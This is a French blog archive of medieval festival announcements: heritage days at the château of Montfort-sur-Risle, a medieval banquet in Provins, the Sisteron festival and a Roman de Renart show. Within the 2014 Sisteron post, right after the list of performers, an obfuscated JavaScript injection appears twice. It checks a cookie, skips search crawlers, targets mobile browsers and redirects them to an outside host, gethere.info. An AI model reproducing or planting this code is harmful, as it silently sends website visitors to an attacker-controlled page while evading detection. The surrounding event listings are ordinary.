Archive pour la catégorie ‘le Médiéviste’

Montfort à la Conquête de l’Angleterre

mardi 5 juillet 2016

Dans le cadre du 950ème Anniversaire de la Bataille d’Hastings, Montfort Culture et Patrimoine présente « Montfort à la Conquête de l’Angleterre» les 17 et 18 septembre au Château Médiéval de Montfort sur Risle (Eure)

Samedi soir 17 septembre à 19h00
Diner avec animation musicale médiévale avec le groupe CELESTIAES
Soirée cinéma à 21h00. Diffusion du film « La jeunesse de Guillaume le Conquérant » de Fabien Drugeon. Sur réservation au cout de 2€ la place. Réservations au 02.32.56.35.76 (Office de Tourisme)
Dimanche 18 septembre 2016.
De 9h00 à 19h00, Animations historiques à destination de tous les publics proposées en toute gratuité dans la basse cour du château :
– Campement médiéval de reconstitution historique présentant le mode vie et de nombreuses animations à destination des enfants (adoubement de chevalier, jeux en bois, jeux d’adresse, tir à l’arc)
– Compagnies de combattants Normands Vikings et Saxons proposant des combats en mêlée illustrant La Mesnie d’Hugues de Montfort qui accompagnait Guillaume lors de la bataille d’Hastings
Les combats chorégraphiés de soldats seront accompagnés de chevaliers haranguant les forces ennemies du haut de leurs destriers.
– Joutes équestres A l’issue de la bataille, des joutes à cheval verront s’affronter de nobles chevaliers combattant en lice pour l’honneur d’une gente dame !
– Spectacle «les Fables de Marie de France» .Danses d’inspiration médiévale et marionnettes pour tous âges.
– Conteuse en costume période ducale qui présentera contes et fabliaux à destination des enfants.
– Marché artisanal et produits régionaux, métiers anciens: forge, Maréchal ferrant, Tailleur de pierre
– Montfort Culture et Patrimoine proposera des visites commentées du site et vous contera l’histoire de la dynastie des Montfort et les techniques militaires en usage.
– La maquette du château vous sera présentée autour d’une exposition de toiles relatant la vie de Guillaume
– Le groupe Celestiaes composé de quatre musiciens et accompagné de deux jongleurs vous accompagnera tout au long de la journée et vous apportera joie et bonne humeur.

Buvette / restauration / sanitaires / stationnement
Horaires :
Samedi 17 Septembre de 18h30 à 23h00 (réservation pour la diffusion du film)
Dimanche 18 Septembre de 9h00 à 19h00

Infos : 0232563576 / site web : www.amcp27.fr

Fête Médiévale / Journées du Patrimoine au Château de Montfort sur Risle le 20 septembre

dimanche 28 juin 2015

Dans le cadre des Journées du Patrimoine qui se tiendront le Dimanche 20 septembre prochain, l’association Montfort Culture et Patrimoine vous donne rendez-vous au château médiéval de Montfort sur Risle pour une journée de festivités.

Sur ce site magnifique des XIe et XIIe, inscrit à l’inventaire supplémentaire des monuments historiques, son passé glorieux vous sera conté alors que le vicomte Hugues II de Montfort accompagnait Guillaume le Conquérant lors de la bataille d’Hastings. Un ensemble d’animations à destination de tous les publics vous est proposé en toute gratuité dans la basse cour du château.

– Un campement médiéval normand des XIe et XIIe prendra place au sein de la basse cour.
Les troupes : La Mesnie des Chevaliers de St Georges, les Compagnons pour Hastings et les Klanen Av Byggvir vous présenteront un campement médiéval comme il s’en tenait aux Xe, XI e et XIIe siècles au gré des pérégrinations des châtelains et hommes d’armes.

– La Mesnie des Chevaliers de St Georges composée de quinze personnes présentera un camp médiéval et des activités didactiques et pédagogiques à destination du public.
Hormis les traditionnels présentations de la vie de camp, de l’armement et de la cuisine médiévale, seront proposées des initiations à l’escrime avec du matériel adapté pour les enfants et différents jeux interactifs.
Des machines de siège du XIIe reproduites avec fidélité tel un trébuchet et une baliste seront présentés et des démonstrations de tirs attenants seront proposés en situation.
Les traditionnels combats de soldats chorégraphiés en individuel ou en mêlée prendront place dans la basse cour alors que des joutes à cheval feront s’affronter de nobles chevaliers combattant en lice.

– Le groupe Jàdys deux jeunes femmes et un percussionniste qui interpréteront des chants venus des quatre coins du monde accompagnés d’instruments de musiques tels que guitare-luth et vièle à archet. Chant séfarades médiévaux, orientaux, de l’an mille, le tout soutenu par le tintement des grelots. Ces ménestrels vous feront voyager à travers le temps

– Les Compagnons pour Hastings proposeront divers ateliers d’artisanat parmi lesquels la confection de cottes de mailles, la fabrication de boucliers et la fabrication de l’Hypocras.
Différentes démonstrations de passes d’Armes seront illustrées et le soldat Normand de l’an 1000 sera présenté dans ses différentes composantes.
L’Archerie et les tirs à l’Arbalète feront l’objet de démonstrations à destination du public pour les adultes et les enfants.

– Les Klanen Av Byggvir présenteront une compagnie Viking de Xe et XIe siècles, ancêtres des Normands qui s’établiront dans le Duché dès les Xe. Seront présentés des travaux d’artisanat : forge, textile, broderie. La mythologie nordique sera évoquée alors que le marché aux esclaves ravira les enfants. Les farouches guerriers Vikings équipés de leur armement proposeront des techniques de combats.

– Un marché artisanal complètera les animations et la diversité de produits régionaux ou les confections particulières issues de l’artisanat susciteront l’engouement de la plupart d’entre vous.
Les enfants auront également la possibilité de parcourir le site au gré de ballades à dos d’âne pour leur plus grand plaisir.

– Des vieux métiers seront présentés tel qu’un atelier de vannerie et confection de paniers, un tour de potier et un maréchal ferrant forgeron , Alexandre Fussien, qui présentera pour le plaisir du public des démonstrations de forge et de ferrage de chevaux percherons.

– L’association Montfort Culture et Patrimoine donnera des visites commentées du site et vous contera l’épopée de la dynastie des Montfort ainsi que l’architecture du monument et les techniques de siège en usage au XIe et XIIe.
Nous vous présenterons les travaux de mise en conservation des maçonneries et le sondage archéologique réalisés par l’association Chantier Histoire et Architecture Médiévale lors des trois dernières campagnes et vous informerons des différents projets attenants dès l’année prochaine.

– La Maquette du château médiéval, réplique effectuée scrupuleusement d’après les plans et recherches archéologiques sera présentée et expliquée au public par Gilles Mauger qui évoquera par ailleurs le mode de construction des édifices militaires et religieux de style roman.

Soucieux de vous accueillir dans les meilleures conditions, une buvette et une petite restauration à base de crêpes complètes ou sucrées vous seront proposées afin de passer la journée en famille. Les sanitaires et le stationnement de votre véhicule à proximité du site complèteront le confort de votre accueil en toute gratuité lors de cette journée.

Horaires : Dimanche 20 Septembre de 9h00 à 19h00

Informations au : 0685618379 ou 0232563576 / site web : www.amcp27.fr

médiévales Montfort

médiévales Montfort

médiévales Montfort

médiévales Montfort

Ripaille spectacle médiéval à Provins

mardi 10 mars 2015

Oyé Oyé !! Gentes damoiselles, damelots et petits hommes

Biene vaine au Banquet des Troubadours de Provins

La cité médiévale de Provins en Seine et marne vous accueille pour découvrir ses monuments historiques et ses nombreux spectacles. Depuis 2009, il existe le Banquet des Troubadours à Provins, une Taverne médiévale.

Le Banquet des Troubadours de Provins restitue l’ambiance des banquets médiévaux tous les samedis. Grandes tablée à l’ancienne, ribaudes en tenues d’époque, recette de maistre queue, accueille salle voûtée du 12ème siècle, ripaille médiévale, hypocras gouleyant et spectacle de troubadours sont autant d’éléments que mettent en avant la Taverne de Provins pour satisfaire votre attente sur le banquet médiéval.

Arrivée au Banquet, nous vous lavons les mains (eau de rose) non point car elles sont sales mais vous n’aurez pas de fourchette à votre droite car elle n’existait pas. Notre conteur vous expliquera les us du banquet. Pour parfaire votre immersion médiévale, laissez-vous séduire par une location de costume à 5 euros sur place. Nous disposons de plus de 80 costumes sur place.

Le banquet médiéval commencera par un peu d’histoire et de culture médiévale par notre conteur, les mets se succéderont en brancard portée par nos ribauds et le mot banquet commencera à prendre tout son sens.  Les papilles se laisseront envoûter par les saveurs du Moyen Age, les us du Moyen age vous amuserons. Pour demander de l’hypocras inutile d’utiliser les s’il vous plat : « J’ai soif ribaud, Qu on m’apporte un cruchon d’Hypocras » il vous suffira de les zéler, les arguer pour avoir breuvages. Profitez en cela ne dure qu’une soirée médiévale.

 

La Ripaille en 5 mets du Banquet médiéval de Provins

 Porée ou « potaige » de légume

Tourte Provinoise

 Rôt de Chaîr & Légumes d’antan

 Tranchoir du Roy

 Visitandine, taillis aux fruits et sa poire syrop

L’outrance de vinasse gouleyante et d’hypocras

La ripaille et les breuvages sont servis à volonté

Alors que vos papilles se reposeront entre chaque met, ce sont vos yeux qui seront éblouis par le spectacle de qualité de notre trublion. Que serait notre banquet médiéval sans ce bouffon, amuseur de foule par ses pitreries accompagné de son jeune prodige en jonglerie. Il suivra des exploits de jonglerie, de la danse, des acrobaties, du diabolo et autres instruments médiévaux pour finir par un spectacle de feu.

Suivez l’actualité sur nos banquets médiévaux de Provins sur  www.provins-banquet-medieval.com

 

Réservation obligatoire au Banquet médiéval de Provins

Ouverture du samedi 28 Mars au mois Novembre 2015

Ouvert les Samedis : 12h – 15h et 20h – 23h

Tarif du banquet médiéval (ripaille + boisson + spectacle) :

adulte 35 euros //  Enfant(-12 ans) 20 euros //  Location de costume  : 5 euros

 

 

Banquet des Troubadours, traiteur médiéval

14 rue Saint Thibault 77160 Provins

banquetdestroubadours@gmail.com

Tel : 06 70 50 08 58

 

Fortuna – Le Roman de Renart – Quelques personnages

lundi 18 août 2014

Présentations des personnages de notre spectacle

Le goupil RENART

Le lion NOBLE

Le cerf BRICHEMER

roman renart 1

ANIMATIONS MEDIEVALES LE 21 SEPTEMBRE AU CHATEAU DE MONTFORT SUR RISLE

lundi 11 août 2014
Montfort Médiévales

Montfort Médiévales

Dans le cadre des Journées du Patrimoine qui se tiendront le 21 septembre prochain, l’association Montfort Culture et Patrimoine vous donne rendez-vous au château médiéval de Montfort sur Risle pour une journée de festivités.

Sur ce site magnifique des XIe et XIIe, inscrit à l’inventaire supplémentaire des monuments historiques, son passé glorieux vous sera conté alors que le vicomte Hugues II de Montfort accompagnait Guillaume le Conquérant lors de la bataille d’Hastings. Un ensemble d’animations à destination de tous les publics vous est proposé en toute gratuité dans la basse cour du château.

– Un campement médiéval normand des XIe et XIIe prendra place au sein de la basse cour.
Les troupes : La Mesnie des Chevaliers de St Georges, les Compagnons pour Hastings et les Compaings d’Esculape vous présenteront un campement médiéval comme il s’en tenait aux Xe XI e et XIIe siècles au gré des pérégrinations des châtelains et hommes d’armes.

– La Mesnie des Chevaliers de St Georges composée de quinze personnes présentera un camp médiéval et des activités didactiques et pédagogiques à destination du public.
Hormis les traditionnels présentations de la vie de camp, de l’armement et de la cuisine médiévale, seront proposées des initiations à l’escrime avec du matériel adapté pour les enfants et différents jeux interactifs.
Des machines de siège du XIIe reproduites avec fidélité tel un trébuchet et une baliste seront présentés et des démonstrations de tirs attenants seront proposés en situation.
Les traditionnels combats de soldats chorégraphiés en individuel ou en mêlée prendront place dans la basse cour alors que des joutes à cheval feront s’affronter de nobles chevaliers combattant en lice.

– Le groupe Meghan : Deux Ménestrels avisés de musique médiévale et celtique présenteront plusieurs œuvres musicales datant du Moyen-âge et animeront en musique le site du château dans sa globalité.

– Les Compagnons pour Hastings proposeront divers ateliers d’artisanat parmi lesquels la confection de cottes de mailles, la fabrication de boucliers et la fabrication de l’Hypocras.
Différentes démonstrations de passes d’Armes seront illustrées et le soldat Normand de l’an 1000 sera présenté dans ses différentes composantes.
L’Archerie et les tirs à l’Arbalète feront l’objet de démonstrations à destination du public pour les adultes et les enfants.

– Les Compaings d’Esculape présenteront une compagnie Viking du Xe siècle, ancêtres des Normands qui s’établiront dans le Duché durant les XIe et XIIe siècles. Seront présentés des travaux d’artisanat, la technique du feu primitif, de farouches guerriers et leur armement, et des techniques de combats.

– Un marché artisanal complètera les animations et la diversité de produits régionaux ou les confections particulières issues de l’artisanat susciteront l’engouement de la plupart d’entre vous.
Les enfants auront également la possibilité de parcourir le site au gré de ballades à dos d’âne pour leur plus grand plaisir.

– Des vieux métiers seront présentés tel qu’un atelier de vannerie et confection de paniers, un tour de potier et un maréchal ferrant forgeron , Alexandre Fussien, qui présentera pour le plaisir du public des démonstrations de forge et de ferrage de chevaux percherons.

– Un spectacle de Marionnettes à destination des enfants intitulé : « Mathilde l’Impératrice et la guerre pour la couronne d’Angleterre » sera proposé par la troupe des comédiens de l’Abbaye de Mortemer qui manipulent 25 marionnettes à fil. Mathilde fille d’Henri Beauclerc et grand-mère de Richard Cœur de Lion évoque l’épisode du début des opérations militaires lors de la succession du Duché de Normandie en 1135.

– L’association Montfort Culture et Patrimoine donnera des visites commentées du site et vous contera l’histoire de la dynastie des Montfort ainsi que l’architecture du monument et les techniques de siège en usage au XIe et XIIe.
Nous vous présenterons les travaux de mise en conservation des maçonneries et le sondage archéologique réalisés par l’association Chantier Histoire et Architecture Médiévale lors des trois dernières campagnes et vous informerons des différents projets attenants pour les années à venir.
– Plusieurs conférences alterneront avec les visites commentées du site.
Au programme : Gilles Mauger racontera la langue Normande et ses origines au travers de la période de la Normandie Ducale. Gilles évoquera également le mode de construction des édifices religieux de style roman.

Soucieux de vous accueillir dans les meilleures conditions, une buvette et une petite restauration à base de crêpes complètes ou sucrées vous seront proposées afin de passer la journée en famille. Les sanitaires et le stationnement de votre véhicule à proximité du site complèteront le confort de votre accueil en toute gratuité lors de cette journée.

Horaires : Dimanche 21 Septembre de 9h00 à 19h00

Informations au : 0685618379 ou 0232563576 / site web : www.amcp27.fr

Fortuna – Le Roman de Renart – Un spectacle en création

dimanche 3 août 2014

A l’occasion des Médiévales de Noisy-le-Grand, les 27 et 28 septembre 2014, L’association Fortuna présentera un spectacle original sur le Roman de Renart. Sur notre site, des informations.roman renart 1

Festival médiéval « Le passage du fort »

mardi 29 juillet 2014

Festival médiéval

Les 23 et 24 août offrez-vous un passage dans le temps à Sisteron.Venez découvrir en famille et en costume médiéval la 5ème édition du Passage du fort. La ville, la Citadelle, les commerçants, les vitrines sont aux couleurs du moyen âge.

Les restaurateurs vous proposent des menus médiévaux

Pour ouvrir ce festival, du 19 au 23 août une exposition dans le hall de la mairie. Jean-Luc CHARRIGNON atelier « le Bois et le fer proposera une animation sur la forge au moyen âge.
Cette exposition présentera la serrurerie, l’art de la table, la fabrication de pointes de flèches au XIIème siècle (entrée gratuite – 10 à 19h00)

Deux journées de fête : le samedi 23 dans la ville et dimanche 24 dans la Citadelle.
L’animation est permanente. Saltimbanques, échassiers, cracheur de feu, fabliaux, musiques, contes… Artisanat, et métiers disparus : haubergier, enlumineur, forgeron. Un saintier réalisera les étapes de fabrication d’une cloche (troussage du moule, coulée et démoulage du battant). Explications sur l’art campanaire au public.
Concert et présentation d’instruments de musique à la cathédrale le samedi
Cavalcades Spectacle de feu Bal médiéval
Passage dans le temps pour la durée d’un week-end, dames et chevaliers, troubadours et hommes d’armes feront tout pour vous divertir
Manifestation «labellisée Qualité» par la Fédération Française des Fêtes et Spectacles Historiques à laquelle nous adhérons depuis 2000. Une Démarche Qualité dans laquelle nous sommes engagés depuis 2006. Ce label récompense les efforts de l’association, qui portent à la fois sur la mesure de la satisfaction des visiteurs de la fête et sur la sensibilisation aux bonnes pratiques des bénévoles de la fête au travers de la signature d’une charte.

Entré concert (samedi 23)
Moins de 12 ans : Gratuit
Groupes (+de 10Pers) & adhérents F.F.F.S.H : 8E
Adultes : 10E

Entré Citadelle (dimanche 24)
Moins de 8ans : Gratuit
Jusqu’à 16 ans : 6E
Groupes (+de 10 Pers.) & adhérents F.F.F.S.H & Personnes costumées: 8E
Adultes : 10E
Accès (gratuit) handicapés moteur, uniquement sur deuxième et troisième terrasse. Accompagnateurs prendre contact à l’accueil.

 

Les intervenants de cette belle fête :
Les Goliards de Provence, Animals & Co, Marymorgan WITCH et l’Ordres des corbeaux, Jean-Luc Charrignon atelier « Le bois et le fer », Cie les Vaguabondes, Le Prince des Dombes, Stéphane HUGUET dit « Sanguin le Heaumier », Les cavaliers des Dunes, Association La Terra de Miramaris, Association Théâtre en liberté, Les Gueux de Volonne, Association L’Ost des temps Jadis, Association L’Ost de Roy, Association la Geste des Terres Hautes, Eric Klee Atelier de sculptures et de fonderie  L’Esquielle, Association Entre Deux Airs Les BMS, VOLPES Patrick, Chloé ALLvar _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

ANIMATIONS MEDIEVALES AU CHATEAU DE MONTFORT SUR RISLE

samedi 17 août 2013

Dans le cadre des Journées du Patrimoine qui auront lieu les 14 et 15 septembre prochains, l’association Montfort Culture et Patrimoine vous donne rendez-vous au château médiéval de Montfort sur Risle pour un week-end de festivités.

Sur ce site magnifique des XIe et XIIe, inscrit à l’inventaire supplémentaire des monuments historiques, son passé glorieux vous sera conté alors que le vicomte Hugues II de Montfort accompagnait Guillaume le Conquérant lors de la bataille d’Hastings.
Un ensemble d’animations à destination de tous les publics vous sont proposées en toute gratuité dans la basse cour du château.

– Un campement médiéval normand des XIe et XIIe prendra place au sein de la basse cour.
Les troupes : La Mesnie des Chevaliers de St Georges et les Compagnons pour Hastings vous présenteront un campement médiéval comme il s’en tenait aux XI e et XIIe siècles au gré des pérégrinations des châtelains et hommes d’armes.

– La Mesnie des Chevaliers de St Georges composée de quinze personnes présentera un camp médiéval et des activités didactiques et pédagogiques à destination du public.
Hormis les traditionnels présentations de la vie de camp, de l’armement et de la cuisine médiévale, seront proposées des initiations à l’escrime avec du matériel adapté pour les enfants et différents jeux interactifs.
Des machines de siège du XIIe reproduites avec fidélité tel un trébuchet et une baliste seront présentés et des démonstrations de tirs attenants seront proposés en situation.
Les traditionnels combats de chevaliers chorégraphiés en individuel ou en mêlée prendront place dans la basse cour alors qu’un noble baron supervisera les combats du haut de son cheval.

– Le groupe Pastourel : trois Ménestrels avisés de musique médiévale instrumentale et chantée présenteront plusieurs œuvres musicales datant du Moyen-âge et animeront en musique le site du château dans sa globalité.

– Le cracheur de feu Gregory Montagna de la compagnie « la flamme dans tous ses états » accompagnera nos amis musiciens de Pastourel et réchauffera l’air ambiant en jonglant avec le feu.

– Les Compagnons pour Hastings proposeront divers ateliers d’artisanat parmi lesquels la confection de cottes de mailles, la fabrication de boucliers et la fabrication de l’Hypocras.
Différentes démonstrations de passes d’Armes seront illustrées et le soldat Normand de l’an 1000 sera présenté dans ses différentes composantes.
L’Archerie et les tirs à l’Arbalète feront l’objet de démonstrations à destination du public pour les adultes et les enfants.

– Un marché artisanal complètera les animations et la diversité de produits régionaux ou les confections particulières issues de l’artisanat susciteront l’engouement de la plupart d’entre vous.
Les enfants auront également la possibilité de parcourir le site au gré de ballades à dos d’âne pour leur plus grand plaisir.

– Un maréchal ferrant et forgeron , Alexandre Fussien présentera, pour le plaisir du public, des démonstrations de forge et de ferrage de chevaux de type percheron.

– L’association Montfort Culture et Patrimoine donnera des visites commentées du site et vous contera l’histoire de la dynastie des Montfort ainsi que l’architecture du monument et les techniques de siège en usage au XIe et XIIe.
Nous vous présenterons les travaux de mise en conservation des maçonneries et le sondage archéologique réalisés par l’association Chantier Histoire et Architecture Médiévale lors des trois dernières campagnes et vous informerons des différents projets attenants pour les années à venir.
Une exposition photos de Delphine Laignel retracera les activités de l’association au travers de portraits et clichés pris « sur le vif »

– Plusieurs conférences alterneront avec les visites commentées du site.
Au programme : Madame Véronique Gazeau, historienne affiliée au CHRAM (Centre de Recherche et Archéologie Médiévale) présentera la biographie des Abbés de Normandie. Gilles Mauger racontera la langue Normande et ses origines au travers de la période de la Normandie Ducale.

Soucieux de vous accueillir dans les meilleures conditions, une buvette et une petite restauration à base de crêpes complètes ou sucrées vous seront proposées afin de passer la journée en famille. Les sanitaires et le stationnement de votre véhicule à proximité du site complèteront le confort de votre accueil en toute gratuité lors de ces deux journées.

Horaires : Samedi 14 Septembre de 14h00 à 19h00 / Dimanche 15 septembre de 9h00 à 19h00
Informations au : 0685618379 ou 0232563576 / site web : www.amcp27.fr

Festival médiéval – SISTERON (04)

vendredi 20 juillet 2012

Du 14 au 19 août  dans le Hall de la Mairie (Entrée gratuite)

Stéphane HUGUET dit  » Sanguin le Heaumier» batteur d’armures fera, sous l’action du soufflet, jaillir de l’acier de subtiles courbes formant l’armure qui protège les vaillants chevaliers. Du plat au volume, du marteau à l’enclume, la « ferraille » rouillée se transformera sous vos yeux en blancs harnois forgés…

Une exposition présentant différents aspects de l’équipement du chevalier au moyen âge et  une démonstration du travail des plaques d’acier pour la réalisation d’une armure.

Samedi 18 août  centre ville de 10h00 à 00h00

Marché médiéval. Artisans démonstrateurs, gens d’armes, seigneurs, gentes dames et nobliaux, saltimbanques et troubadours s’affairent pour vous divertir. Marchands et artisans vaquent à leurs offices, travail du bois, du fer, de la terre : un potier réalisera une jarre selon la technique du montage à la corde. Fabrication de cotte de maille. Hypocras, pains, miel, bijoux, laine, objets en bois, sellerie…  Animation du marché, avec musiques et danseries, échassier, cracheur de feu… Déambulations de gueux et de soldats,  démonstrations de combats, fabliaux,  exposition d’armes…

10h00 Ouverture du village médiéval

11h00 et 17h00 Cavalcade dans les rues de la ville

21h00 Concert médiéval (entrée payante) à la cathédrale par la Compagnie Satara. 

